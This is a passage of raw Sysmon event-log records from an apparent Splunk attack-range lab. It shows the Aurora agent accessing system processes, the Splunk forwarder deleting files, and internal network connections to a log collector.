Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015323Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.532{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 23542300x800000000000000040052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:42.250{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837792722984D0053EE3BDD5507B9B95,SHA256=F1706AF761473492F2CB15CE8C413FE5B57DFC72CFBB20FA0807BB85601EB88C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015355Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:43.947{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD0D16DB0A41955057E7D643178C6D4F,SHA256=73C9F1F938F07499BA374DCB202E31F2AA0063DA22F19C003390024169D01D5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:43.341{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642DD4D60662B7FF325044FB2E5AEBAE,SHA256=09853A5E37B6DEB3739F1D70B6069F679DDE21E8444376E1B22468C9155C90DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:44.405{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C058656DA68C6BAC980939185BD552,SHA256=D08971B85BBB92913976F264057810DFCAA9C832ABB7ADD0E26A36BAD905E20A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015356Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:42.137{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50045-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000040056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:45.495{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42E050C7711DB9DCC3775F07961BC50,SHA256=31A9D6DC2B03DD01B73C67D5A32383763E9D5EB010C1371B50B91CC0F3148F2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015357Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:45.040{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92A144251DE34BA9E3FBA815C8683201,SHA256=C8CBED32E2EF151996A32C749423859B2D8B9378DF5DD1E72FACAFC12846BC70,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:41.722{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56233-false10.0.1.12-8000- 23542300x800000000000000040057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:46.569{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AFB3CB4289E6435AB70ADAAB26AF3CF,SHA256=A7224577C0C5E48AFAB1C212A14973F8FA8C73AF6A7B1AD78D9950BBC58D59BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015358Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:46.122{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D19384A5916125F87E567832F5C94879,SHA256=24500F729B97C324AE358F14C690BE97185A245E47ED7D7A38D4E17DA12858FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:47.640{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C15B0E38A4708EADEB253C2D4669B8,SHA256=597ADB62814942CB858C823173B3013D3C96BC4B8597F366CCEC9443BE26849E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015359Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:47.202{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB6F3979EC49CABD5214B85AA3FA875,SHA256=EFBA22F3A24D4D54952AAF9DE8E98EEC5790A790E22CDCB0FE882266EA5344B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:48.729{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56D9E9A964926DFEA76DE767FFB429DC,SHA256=BB03B9CCC2C9CA979711442FE7E8374E863FA52CEFD579F15E6C9300570EBA0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015360Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:48.294{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C3F660CB7DBF07933A6FB473FD85A05,SHA256=5F92F939946CC348E01B9537D8722D233872E9338D42EBEC15EADEB4395EDF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:49.798{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50D21EB60BC764E4AABD06EB8EDDC7D1,SHA256=70A1CBC65FCCCA72BAB26723800C28E577891BC00674CDE0489C2BE1BAB22333,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015361Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:49.375{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DE3E69E8BF4D8EAF33E2B03FD8E5ECB,SHA256=2AF13FF6DB371B20B9204C82906CAC996EBAE63243FABA14686418621831D82D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:50.882{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED835FA64391C2719C984C022EEC78D7,SHA256=33286F6228897D6295DECAFD701F6E83733663C97279C505E81B9EF49122268C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015363Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:50.471{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9C94955F59227F17ECD3D9EAFE7634,SHA256=82553DC4E50018A0054D68DE4F39FCF9E9759204E8593CBB09F4E7DB30CB740A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:47.667{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56234-false10.0.1.12-8000- 354300x800000000000000015362Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:48.049{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50046-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015364Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:51.557{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5F2D81A2D4884E98B067A7CC2EB6E7,SHA256=E1A185E0E71271072BF8FBE23FAFBE698207BA65C5B70BE3F84F5A1B8C5E3496,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.951{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E458CDF87D91631034205ECE7EEEF76,SHA256=2FF0B4E17CCC35382959EE8752F4D417F31FE44E645ECC414BD949B9AB4A16D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program 